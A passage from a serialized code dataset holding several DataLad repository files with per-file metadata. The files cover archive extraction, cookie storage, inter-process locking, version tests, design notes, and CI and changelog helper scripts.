bloody file from the bloody archive\n # TODO: implement/use caching, for now a simple one\n # actually patool doesn't support extraction of a single file\n # https://github.com/wummel/patool/issues/20\n # so\n pwd = getpwd()\n lgr.debug(\n \"Getting file %s from %s while PWD=%s\",\n afile, akey_path, pwd)\n was_extracted = self.cache[akey_path].is_extracted\n apath = self.cache[akey_path].get_extracted_file(afile)\n link_file_load(apath, file)\n if not was_extracted and self.cache[akey_path].is_extracted:\n self.message(\n \"%s special remote is using an extraction cache \"\n \"under %s. Remove it with DataLad's 'clean' \"\n \"command to save disk space.\" %\n (ARCHIVES_SPECIAL_REMOTE,\n self.cache[akey_path].path),\n type='info',\n )\n return\n except Exception as exc:\n ce = CapturedException(exc)\n self.message(\n \"Failed to fetch {akey} containing {key}: {msg}\".format(\n akey=akey,\n key=key,\n # we need to get rid of any newlines, or we might\n # break the special remote protocol\n msg=str(ce).replace('\\n', '|')\n ))\n continue\n\n raise RemoteError(\n \"Failed to fetch any archive containing {key}. \"\n \"Tried: {akeys_tried}\".format(**locals())\n )\n\n def claimurl(self, url):\n scheme = urlparse(url).scheme\n if scheme in self.SUPPORTED_SCHEMES:\n return True\n else:\n return False\n\n def _annex_get_archive_by_key(self, akey):\n # TODO: make it more stringent?\n # Command could have fail to run if key was not present locally yet\n # Thus retrieve the key using annex\n # TODO: we need to report user somehow about this happening and\n # progress on the download\n from humanize import naturalsize\n\n from datalad.support.annexrepo import AnnexJsonProtocol\n\n akey_size = self.repo.get_size_from_key(akey)\n self.message(\n \"To obtain some keys we need to fetch an archive \"\n \"of size %s\"\n % (naturalsize(akey_size) if akey_size else \"unknown\"),\n type='info',\n )\n\n try:\n self.repo._call_annex(\n [\"get\", \"--json\", \"--json-progress\", \"--key\", akey],\n protocol=AnnexJsonProtocol,\n )\n except Exception:\n self.message(f'Failed to fetch archive with key {akey}')\n raise\n\n\ndef main():\n \"\"\"cmdline entry point\"\"\"\n super_main(\n cls=ArchiveAnnexCustomRemote,\n remote_name='datalad-archives',\n description=\\\n \"extract content from archives (.tar{,.gz}, .zip, etc) which are \"\n \"in turn managed by git-annex. See `datalad add-archive-content` \"\n \"command\",\n )\n" }, { "alpha_fraction": 0.601012647151947, "alphanum_fraction": 0.6303797364234924, "avg_line_length": 41.934783935546875, "blob_id": "9d4d64b35c20e1018dc3fd1860a07e75437ed6c0", "content_id": "189606b0d189b11c548f2f1ef651c3f96ea416c5", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1975, "license_type": "permissive", "max_line_length": 171, "num_lines": 46, "path": "/datalad/support/tests/test_cookies.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nfrom datalad.support import path as op\nfrom datalad.tests.utils_pytest import (\n assert_equal,\n known_failure_githubci_win,\n with_tempfile,\n)\nfrom datalad.utils import rmtree\n\nfrom ..cookies import CookiesDB\n\n\n@known_failure_githubci_win\n@with_tempfile(mkdir=True)\ndef test_no_blows(cookiesdir=None):\n cookies = CookiesDB(op.join(cookiesdir, 'mycookies'))\n # set the cookie\n cookies['best'] = 'mine'\n assert_equal(cookies['best'], 'mine')\n \"\"\"\n Somehow this manages to trigger on conda but not on debian for me\n File \"/home/yoh/anaconda-2018.12-3.7/envs/test-gitpython/lib/python3.7/shelve.py\", line 125, in __setitem__\n self.dict[key.encode(self.keyencoding)] = f.getvalue()\n File \"/home/yoh/anaconda-2018.12-3.7/envs/test-gitpython/lib/python3.7/dbm/dumb.py\", line 216, in __setitem__\n self._index[key] = self._setval(pos, val)\n File \"/home/yoh/anaconda-2018.12-3.7/envs/test-gitpython/lib/python3.7/dbm/dumb.py\", line 178, in _setval\n with _io.open(self._datfile, 'rb+') as f:\n FileNotFoundError: [Errno 2] No such file or directory: '/home/yoh/.tmp/datalad_temp_test_no_blowsalnsw_wk/mycookies.dat'\n\n on Debian (python 3.7.3~rc1-1) I just get a warning: BDB3028 /home/yoh/.tmp/datalad_temp_test_no_blows58tdg67s/mycookies.db: unable to flush: No such file or directory\n \"\"\"\n try:\n rmtree(cookiesdir)\n except OSError:\n # on NFS directory might still be open, so .nfs* lock file would prevent\n # removal, but it shouldn't matter and .close should succeed\n pass\n cookies.close()\n" }, { "alpha_fraction": 0.7606557607650757, "alphanum_fraction": 0.7606557607650757, "avg_line_length": 32.88888931274414, "blob_id": "f1fd2c8b1fbbf56f87f93fbc408c97fb18f9efc1", "content_id": "fe21ec4ef2c6bd244a1073e630e2b3991f155d56", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 305, "license_type": "permissive", "max_line_length": 74, "num_lines": 9, "path": "/datalad/plugin/export_to_figshare.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "import warnings\n\nwarnings.warn(\n \"datalad.plugin.export_to_figshare is deprecated and will be removed \"\n \"in a future release. Use the module from its new location \"\n \"datalad.distributed.export_to_figshare instead.\",\n DeprecationWarning)\n\nfrom datalad.distributed.export_to_figshare import *\n" }, { "alpha_fraction": 0.6517150402069092, "alphanum_fraction": 0.662269115447998, "avg_line_length": 21.294116973876953, "blob_id": "eed10ab4c4e1ae38755a045d6c06077e1a9cbf30", "content_id": "a2f8eb5e160583cc7b3914c1055f52fee333e0f2", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 379, "license_type": "permissive", "max_line_length": 98, "num_lines": 17, "path": "/tools/ci/install-minimum-git.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\nset -eu\n\nMIN_VERSION=\"$(perl -ne 'print $1 if /^ *GIT_MIN_VERSION = \"(\\S+)\"$/' datalad/support/gitrepo.py)\"\nif test -z \"$MIN_VERSION\"\nthen\n echo \"Failed to extract minimum git version\" >&2\n exit 1\nfi\n\ntarget_dir=\"$PWD/git-src\"\ngit clone https://github.com/git/git \"$target_dir\"\ncd \"$target_dir\"\ngit checkout \"refs/tags/v$MIN_VERSION\"\nmake --jobs 2\n./git version\n" }, { "alpha_fraction": 0.5025746822357178, "alphanum_fraction": 0.5077239871025085, "avg_line_length": 36.346153259277344, "blob_id": "15f9939fbd919b0d83c62dd652c77796c41e6ffa", "content_id": "3198eb0f6cfdc0d9c5bcf6615f96baabc0f2109b", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 971, "license_type": "permissive", "max_line_length": 87, "num_lines": 26, "path": "/datalad/cli/tests/test_helpers.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Tests for cmdline.helpers\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nfrom datalad.tests.utils_pytest import assert_equal\n\nfrom ..helpers import _fix_datalad_ri\n\n\ndef test_fix_datalad_ri():\n assert_equal(_fix_datalad_ri('/'), '/')\n assert_equal(_fix_datalad_ri('/a/b'), '/a/b')\n assert_equal(_fix_datalad_ri('//'), '///')\n assert_equal(_fix_datalad_ri('///'), '///')\n assert_equal(_fix_datalad_ri('//a'), '///a')\n assert_equal(_fix_datalad_ri('///a'), '///a')\n assert_equal(_fix_datalad_ri('//a/b'), '///a/b')\n assert_equal(_fix_datalad_ri('///a/b'), '///a/b')\n" }, { "alpha_fraction": 0.5072765350341797, "alphanum_fraction": 0.5218295454978943, "avg_line_length": 27.294116973876953, "blob_id": "fae15a278a9f54aeb66aab649d7524468ebded93", "content_id": "e89eb512d315f407af844183b0f604a28c651bbd", "detected_licenses": [ "BSD-3-Clause", "MIT", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 481, "license_type": "permissive", "max_line_length": 100, "num_lines": 17, "path": "/tools/testing/travis_ifdown_nonlo.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# Helper to bring interfaces down/up for testing\nset -eu\nif [ $1 = \"down\" ]; then\n NONLO=$(ifconfig | awk '/^[a-z]/{print $1;}' | grep -v '^lo$' | tr '\\n' ' ' | sed -e 's, *$,,g')\n for i in $NONLO; do\n echo \"I: bringing down $i\" >&2\n sudo ifdown $i >&2\n done\n echo \"export DATALAD_TESTS_NONLO='$NONLO'\"\nelif [ $1 = \"up\" ]; then\n for i in ${DATALAD_TESTS_NONLO}; do\n echo \"I: bringing up $i\" >&2\n sudo ifup $i >&2\n done\n\nfi\n" }, { "alpha_fraction": 0.7504196763038635, "alphanum_fraction": 0.7526580691337585, "avg_line_length": 42.06024169921875, "blob_id": "e5d0a1a941b3d9542e69761b43fcfeb6e896ab74", "content_id": "54cbf25f6839e1447073f1e603cb985aac1df090", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 3574, "license_type": "permissive", "max_line_length": 79, "num_lines": 83, "path": "/docs/source/design/miscpatterns.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_designpatterns:\n\n**********************\nMiscellaneous patterns\n**********************\n\nDataLad is the result of a distributed and collaborative development effort\nover many years. During this time the scope of the project has changed\nmultiple times. As a consequence, the API and employed technologies have been\nadjusted repeatedly. Depending on the age of a piece of code, a clear software\ndesign is not always immediately visible. This section documents a few design\npatterns that the project strives to adopt at present. Changes to existing code\nand new contributions should follow these guidelines.\n\n\nGenerator methods in `Repo` classes\n===================================\n\nSubstantial parts of DataLad are implemented to behave like Python generators\nin order to be maximally responsive when processing long-running tasks. This\nincluded methods of the core API classes\n:class:`~datalad.support.gitrepo.GitRepo` and\n:class:`~datalad.support.annexrepo.AnnexRepo`. By convention, such methods\ncarry a trailing `_` in their name. In some cases, sibling methods with the\nsame name, but without the trailing underscore are provided. These behave like\ntheir generator-equivalent, but eventually return an iterable once processing\nis fully completed.\n\n\nCalls to Git commands\n=====================\n\nDataLad is built on Git, so calls to Git commands are a key element of the code\nbase. All such calls should be made through methods of the\n:class:`~datalad.support.gitrepo.GitRepo` class. This is necessary, as only\nthere it is made sure that Git operates under the desired conditions\n(environment configuration, etc.).\n\nFor some functionality, for example querying and manipulating `gitattributes`,\ndedicated methods are provided. However, in many cases simple one-off calls to\nget specific information from Git, or trigger certain operations are needed.\nFor these purposes the :class:`~datalad.support.gitrepo.GitRepo` class provides\na set of convenience methods aiming to cover use cases requiring particular\nreturn values:\n\n- test success of a command:\n :meth:`~datalad.support.gitrepo.GitRepo.call_git_success`\n- obtain `stdout` of a command:\n :meth:`~datalad.support.gitrepo.GitRepo.call_git`\n- obtain a single output line:\n :meth:`~datalad.support.gitrepo.GitRepo.call_git_oneline`\n- obtain items from output split by a separator:\n :meth:`~datalad.support.gitrepo.GitRepo.call_git_items_`\n\nAll these methods take care of raising appropriate exceptions when expected\nconditions are not met. Whenever desired functionality can be achieved\nusing simple custom calls to Git via these methods, their use is preferred\nover the implementation of additional, dedicated wrapper methods.\n\nCommand examples\n================\n\nExamples of Python and commandline invocations of DataLad's user-oriented\ncommands are defined in the class of the respective command as dictionaries\nwithin `_examples_`:\n\n.. code-block:: python\n\n _examples_ = [\n dict(text=\"\"\"Create a dataset 'mydataset' in the current directory\"\"\",\n code_py=\"create(path='mydataset')\",\n code_cmd=\"datalad create mydataset\",\n dict(text=\"\"\"Apply the text2git procedure upon creation of a dataset\"\"\",\n code_py=\"create(path='mydataset', cfg_proc='text2git')\",\n code_cmd=\"datalad create -c text2git mydataset\")\n ]\n\nThe formatting of code lines is preserved. Changes to existing examples and\nnew contributions should provide examples for Python and commandline API, as\nwell as a concise description.\n" }, { "alpha_fraction": 0.6428571343421936, "alphanum_fraction": 0.6477832794189453, "avg_line_length": 18.33333396911621, "blob_id": "f01b3a3a54de1d6d78712f924d45acbdd0882b24", "content_id": "439debe98e26ed0cdfa3516bf122ce4b0a96caf3", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 812, "license_type": "permissive", "max_line_length": 76, "num_lines": 42, "path": "/tools/ci/benchmark-travis-pr.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -eu\n\nif [ \"$TRAVIS_PULL_REQUEST\" = \"false\" ]\nthen\n echo \"I: skipping benchmarks for non-PR branch\"\n exit 0\nfi\n\nconfigure_asv () {\n cat << EOF > asv.conf.json\n{\n \"version\": 1,\n \"repo\": \".\",\n \"branches\": [\"HEAD\"],\n \"environment_type\": \"virtualenv\",\n}\nEOF\n}\n\nrun_asv () {\n pip install -e .\n git show --no-patch --format=\"%H (%s)\"\n configure_asv\n asv run -E existing --set-commit-hash $(git rev-parse HEAD)\n}\n\npip install asv\nasv machine --yes\n\ngit update-ref refs/bm/pr HEAD\n# We know this is a PR run. The branch is a GitHub refs/pull/*/merge ref, so\n# the current target that this PR will be merged into is HEAD^1.\ngit update-ref refs/bm/merge-target HEAD^1\n\nrun_asv\n\ngit checkout --force refs/bm/merge-target\nrun_asv\n\nasv compare refs/bm/merge-target refs/bm/pr\n" }, { "alpha_fraction": 0.5668638944625854, "alphanum_fraction": 0.5682840347290039, "avg_line_length": 33.63114929199219, "blob_id": "51f4df150036da4a699e2513b24bf7a48c4db888", "content_id": "f5e42a50bf837ab65c885aef02f7b176356d7191", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4225, "license_type": "permissive", "max_line_length": 126, "num_lines": 122, "path": "/datalad/support/cookies.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Management of cookies for HTTP sessions\"\"\"\n\nfrom __future__ import annotations\n\nimport atexit\nimport logging\nimport os.path\nimport shelve\nfrom pathlib import Path\nfrom typing import (\n Any,\n Optional,\n)\n\nimport platformdirs\n\nfrom datalad.support.exceptions import CapturedException\n\nfrom .network import get_tld\n\nlgr = logging.getLogger('datalad.cookies')\n\n\n# FIXME should make into a decorator so that it closes the cookie_db upon exiting whatever func uses it\nclass CookiesDB:\n \"\"\"Some little helper to deal with cookies\n\n Lazy loading from the shelved dictionary\n\n TODO: this is not multiprocess or multi-thread safe implementation due to shelve auto saving etc\n \"\"\"\n def __init__(self, filename: Optional[str | Path] = None) -> None:\n self._filename = filename\n self._cookies_db: Optional[shelve.Shelf[Any]] = None\n atexit.register(self.close)\n\n @property\n def cookies_db(self) -> Optional[shelve.Shelf[Any]]:\n if self._cookies_db is None:\n self._load()\n return self._cookies_db\n\n def _load(self):\n if self._cookies_db is not None:\n return\n if self._filename:\n filename = self._filename\n cookies_dir = os.path.dirname(filename)\n else:\n cookies_dir = os.path.join(platformdirs.user_config_dir(), 'datalad') # FIXME prolly shouldn't hardcode 'datalad'\n filename = os.path.join(cookies_dir, 'cookies')\n\n # TODO: guarantee restricted permissions\n\n if not os.path.exists(cookies_dir):\n os.makedirs(cookies_dir)\n\n lgr.debug(\"Opening cookies DB %s\", filename)\n try:\n self._cookies_db = shelve.open(filename, writeback=True, protocol=2)\n except Exception as exc:\n lgr.warning(\"Failed to open cookies DB %s: %s\",\n filename, CapturedException(exc))\n\n def close(self) -> None:\n if self._cookies_db is not None:\n try:\n # It might print out traceback right on the terminal instead of\n # just throwing an exception\n known_cookies = list(self._cookies_db)\n except Exception:\n # May be already not accessible\n known_cookies = None\n try:\n self._cookies_db.close()\n except Exception as exc:\n ce = CapturedException(exc)\n if known_cookies:\n lgr.warning(\n \"Failed to save possibly updated %d cookies (%s): %s\",\n len(known_cookies), ', '.join(known_cookies), ce)\n # no cookies - no worries!\n self._cookies_db = None\n\n def _get_provider(self, url: str) -> str:\n tld = get_tld(url)\n return tld\n\n def __getitem__(self, url: str) -> Any:\n try:\n return self.cookies_db[self._get_provider(url)] # type: ignore[index]\n except Exception as exc:\n lgr.warning(\"Failed to get a cookie for %s: %s\",\n url, CapturedException(exc))\n return None\n\n def __setitem__(self, url: str, value: Any) -> None:\n try:\n self.cookies_db[self._get_provider(url)] = value # type: ignore[index]\n except Exception as exc:\n lgr.warning(\"Failed to set a cookie for %s: %s\",\n url, CapturedException(exc))\n\n def __contains__(self, url: str) -> Optional[bool]:\n try:\n return self._get_provider(url) in self.cookies_db # type: ignore[operator]\n except Exception as exc:\n lgr.warning(\"Failed to check for having a cookie for %s: %s\",\n url, CapturedException(exc))\n return None\n\n\n# TODO -- convert into singleton pattern for CookiesDB\ncookies_db = CookiesDB()\n" }, { "alpha_fraction": 0.610863208770752, "alphanum_fraction": 0.6139405965805054, "avg_line_length": 33.569149017333984, "blob_id": "7cf638276229633fa93e2b07b87cd83144ffa259", "content_id": "dec4911323deb905d11b4da18b0df5528c4fc594", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6499, "license_type": "permissive", "max_line_length": 108, "num_lines": 188, "path": "/datalad/support/locking.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "from fasteners import (\n InterProcessLock,\n try_lock,\n)\nfrom contextlib import contextmanager\n\nfrom .path import exists\nfrom ..utils import (\n ensure_unicode,\n get_open_files,\n unlink,\n)\nfrom datalad.support.exceptions import CapturedException\n\n\nimport logging\nlgr = logging.getLogger('datalad.locking')\n\n\ndef _get(entry):\n \"\"\"A helper to get the value, be it a callable or callable with args, or value\n\n \"\"\"\n if isinstance(entry, (tuple, list)):\n func, args = entry\n return func(*args)\n elif callable(entry):\n return entry()\n else:\n return entry\n\n\n@contextmanager\ndef lock_if_check_fails(\n check,\n lock_path,\n operation=None,\n blocking=True,\n _return_acquired=False,\n **kwargs\n):\n \"\"\"A context manager to establish a lock conditionally on result of a check\n\n It is intended to be used as a lock for a specific file and/or operation,\n e.g. for `annex get`ing a file or extracting an archive, so only one process\n would be performing such an operation.\n\n If verification of the check fails, it tries to acquire the lock, but if\n that fails on the first try, it will rerun check before proceeding to func\n\n checker and lock_path_prefix could be a value, or callable, or\n a tuple composing callable and its args\n\n Unfortunately yoh did not find any way in Python 2 to have a context manager\n which just skips the entire block if some condition is met (in Python3 there\n is ExitStack which could potentially be used). So we would need still to\n check in the block body if the context manager return value is not None.\n\n Note also that the used type of the lock (fasteners.InterprocessLock) works\n only across processes and would not lock within the same (threads) process.\n\n Parameters\n ----------\n check: callable or (callable, args) or value\n If value (possibly after calling a callable) evaluates to True, no\n lock is acquired, and no context is executed\n lock_path: callable or (callable, args) or value\n Provides a path for the lock file, composed from that path + '.lck'\n extension\n operation: str, optional\n If provided, would be part of the locking extension\n blocking: bool, optional\n If blocking, process would be blocked until acquired and verified that it\n was acquired after it gets the lock\n _return_acquired: bool, optional\n Return also if lock was acquired. For \"private\" use within DataLad (tests),\n do not rely on it in 3rd party solutions.\n **kwargs\n Passed to `.acquire` of the fasteners.InterProcessLock\n\n Returns\n -------\n result of check, lock[, acquired]\n \"\"\"\n check1 = _get(check)\n if check1: # we are done - nothing to do\n yield check1, None\n return\n # acquire blocking lock\n lock_filename = _get(lock_path)\n\n lock_filename += '.'\n if operation:\n lock_filename += operation + '-'\n lock_filename += 'lck'\n\n lock = InterProcessLock(lock_filename)\n acquired = False\n try:\n lgr.debug(\"Acquiring a lock %s\", lock_filename)\n acquired = lock.acquire(blocking=blocking, **kwargs)\n lgr.debug(\"Acquired? lock %s: %s\", lock_filename, acquired)\n if blocking:\n assert acquired\n check2 = _get(check)\n ret_lock = None if check2 else lock\n if _return_acquired:\n yield check2, ret_lock, acquired\n else:\n yield check2, ret_lock\n finally:\n if acquired:\n lgr.debug(\"Releasing lock %s\", lock_filename)\n lock.release()\n if exists(lock_filename):\n unlink(lock_filename)\n\n\n@contextmanager\ndef try_lock_informatively(lock, purpose=None, timeouts=(5, 60, 240), proceed_unlocked=False):\n \"\"\"Try to acquire lock (while blocking) multiple times while logging INFO messages on failure\n\n Primary use case is for operations which are user-visible and thus should not lock\n indefinetely or for long period of times (so user would just Ctrl-C if no update is provided)\n without \"feedback\".\n\n Parameters\n ----------\n lock: fasteners._InterProcessLock\n purpose: str, optional\n timeouts: tuple or list, optional\n proceed_unlocked: bool, optional\n \"\"\"\n purpose = \" to \" + str(purpose) if purpose else ''\n\n # could be bytes, making formatting trickier\n lock_path = ensure_unicode(lock.path)\n\n def get_pids_msg():\n try:\n pids = get_open_files(lock_path)\n if pids:\n proc = pids[lock_path]\n return f'Check following process: PID={proc.pid} CWD={proc.cwd()} CMDLINE={proc.cmdline()}.'\n else:\n return 'Stale lock? I found no processes using it.'\n except Exception as exc:\n lgr.debug(\n \"Failed to get a list of processes which 'posses' the file %s: %s\",\n lock_path,\n CapturedException(exc)\n )\n return 'Another process is using it (failed to determine one)?'\n\n lgr.debug(\"Acquiring a currently %s lock%s. If stalls - check which process holds %s\",\n (\"existing\" if lock.exists() else \"absent\"),\n purpose,\n lock_path)\n\n was_locked = False # name of var the same as of within fasteners.try_lock\n assert timeouts # we expect non-empty timeouts\n try:\n for trial, timeout in enumerate(timeouts):\n was_locked = lock.acquire(blocking=True, timeout=timeout)\n if not was_locked:\n if trial < len(timeouts) - 1:\n msg = \" Will try again and wait for up to %4g seconds.\" % (timeouts[trial+1],)\n else: # It was the last attempt\n if proceed_unlocked:\n msg = \" Will proceed without locking.\"\n else:\n msg = \"\"\n lgr.info(\"Failed to acquire lock%s at %s in %4g seconds. %s%s\",\n purpose, lock_path, timeout, get_pids_msg(), msg)\n else:\n yield True\n return\n else:\n assert not was_locked\n if proceed_unlocked:\n yield False\n else:\n raise RuntimeError(\n \"Failed to acquire lock%s at %s in %d attempts.%s\"\n % (purpose, lock_path, len(timeouts), get_pids_msg()))\n finally:\n if was_locked:\n lock.release()\n" }, { "alpha_fraction": 0.5260980129241943, "alphanum_fraction": 0.5289624333381653, "avg_line_length": 39.80519485473633, "blob_id": "3d036f59f2b3f6eca82588aaeadf2b38a48a62ea", "content_id": "14951b43f85c6c53ac37d6040a7f62a2e95674fe", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3142, "license_type": "permissive", "max_line_length": 88, "num_lines": 77, "path": "/datalad/tests/test_version.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nimport re\n\nfrom packaging.version import Version\n\nfrom datalad.support import path as op\nfrom datalad.tests.utils_pytest import (\n SkipTest,\n assert_equal,\n assert_greater,\n assert_in,\n assert_not_in,\n ok_startswith,\n)\nfrom datalad.utils import ensure_unicode\n\nfrom .. import __version__\n\n\ndef test__version__():\n # in released stage, version in the last CHANGELOG entry\n # should correspond to the one in datalad\n CHANGELOG_filename = op.join(\n op.dirname(__file__), op.pardir, op.pardir, 'CHANGELOG.md')\n if not op.exists(CHANGELOG_filename):\n raise SkipTest(\"no %s found\" % CHANGELOG_filename)\n regex = re.compile(r'^# '\n r'(?P<version>[0-9]+\\.[0-9.abcrc~]+)\\s+'\n r'\\((?P<date>.*)\\)'\n )\n with open(CHANGELOG_filename, 'rb') as f:\n for line in f:\n line = line.rstrip()\n if not line.startswith(b'# '):\n # The first section header we hit, must be our changelog entry\n continue\n reg = regex.match(ensure_unicode(line))\n if not reg: # first one at that level is the one\n raise AssertionError(\n \"Following line must have matched our regex: %r\" % line)\n regd = reg.groupdict()\n changelog_version = regd['version']\n lv_changelog_version = Version(changelog_version)\n # we might have a suffix - sanitize\n san__version__ = __version__.rstrip('.dirty')\n lv__version__ = Version(san__version__)\n if '???' in regd['date'] and 'will be better than ever' in regd['codename']:\n # we only have our template\n # we can only assert that its version should be higher than\n # the one we have now\n assert_greater(lv_changelog_version, lv__version__)\n else:\n # should be a \"release\" record\n assert_not_in('???', regd['date'])\n ok_startswith(__version__, changelog_version)\n if lv__version__ != lv_changelog_version:\n # It was not tagged yet and Changelog has no new records\n # (they are composed by auto upon release)\n assert_greater(lv__version__, lv_changelog_version)\n assert_in('+', san__version__) # we have build suffix\n else:\n # all is good, tagged etc\n assert_equal(lv_changelog_version, lv__version__)\n assert_equal(changelog_version, san__version__)\n return\n\n raise AssertionError(\n \"No log line matching our regex found in %s\" % CHANGELOG_filename\n )\n" }, { "alpha_fraction": 0.6006787419319153, "alphanum_fraction": 0.6097285151481628, "avg_line_length": 19.090909957885742, "blob_id": "25cbf48543a914b4c515f2a9b53d496cd817ba68", "content_id": "dd9af614ad3abe1498cd13c7530779e1a713a10c", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 884, "license_type": "permissive", "max_line_length": 76, "num_lines": 44, "path": "/tools/changelog-todo", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\nset -eu\n\nusage () {\n cat >&2 <<EOF\nusage: $0\n\nCreate a CHANGELOG to-do list for items between the last commit that touched\nthe CHANGELOG and the current commit.\nEOF\n}\n\ntest $# -eq 0 || { usage; exit 1; }\n\nclog=CHANGELOG.md\nheadrev=$(git rev-parse HEAD)\n\nlastrev=$(git rev-list --no-merges --first-parent -n1 HEAD -- \":(top)$clog\")\nif test -z \"$lastrev\"\nthen\n echo >&2 \"Could not determine last commit to touch $clog\"\n exit 1\nfi\n\nfmt=\"? %s%n %h^-1\"\nrange=\"$lastrev..$headrev\"\n\ncat <<EOF\nUpdate $(git describe \"HEAD:$clog\")\n\nGenerated with\n git log --format=\"$fmt\" --reverse --first-parent \\\\\n $range\n\n? = unprocessed and undecided\n- = decided not to include\n+ = included\n+* = included, but might still be bits that should be added\n-----------------------------------------------------------\n\nEOF\n\ngit log --format=\"$fmt\" --reverse --first-parent \"$range\"\n" }, { "alpha_fraction": 0.5594013333320618, "alphanum_fraction": 0.5687558650970459, "avg_line_length": 25.073171615600586, "blob_id": "cd3f59f249c867b46ae732b9d9a7379a04b2843f", "content_id": "9798aad6178d46825eecef623c245bd1e8a3644c", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1069, "license_type": "permissive", "max_line_length": 79, "num_lines": 41, "path": "/datalad/distributed/tests/test_create_sibling_gogs.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test create publication target on GOGS\"\"\"\n\nfrom datalad.api import (\n Dataset,\n create_sibling_gogs,\n)\nfrom datalad.tests.utils_pytest import (\n assert_raises,\n skip_if_no_network,\n with_tempfile,\n)\n\nfrom .test_create_sibling_ghlike import check4real\n\n\n@with_tempfile\ndef test_invalid_call(path=None):\n ds = Dataset(path).create()\n # no API url given\n assert_raises(ValueError, ds.create_sibling_gogs, 'bogus')\n\n\n@skip_if_no_network\n@with_tempfile\ndef test_gogs(path=None):\n # try.gogs.io will only handle 10 repos, but we need one\n # and could handle 10 concurrent test runs\n check4real(\n create_sibling_gogs,\n path,\n 'gogs',\n 'https://try.gogs.io',\n 'api/v1/repos/dataladtester/{reponame}',\n )\n" }, { "alpha_fraction": 0.6356340050697327, "alphanum_fraction": 0.6364365816116333, "avg_line_length": 38.399208068847656, "blob_id": "de45a5e50add83379984660cf236520bc2ef9456", "content_id": "b5e92dbac46b58c1aa8b6ee827958b25e477b52b", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9968, "license_type": "permissive", "max_line_length": 80, "num_lines": 253, "path": "/datalad/tests/utils_cached_dataset.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "\"\"\"Utils for cached test datasets\"\"\"\n\nfrom datalad import cfg\nfrom datalad.core.distributed.clone import Clone\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.tests.utils_pytest import (\n DEFAULT_REMOTE,\n with_tempfile,\n)\nfrom datalad.utils import (\n Path,\n better_wraps,\n 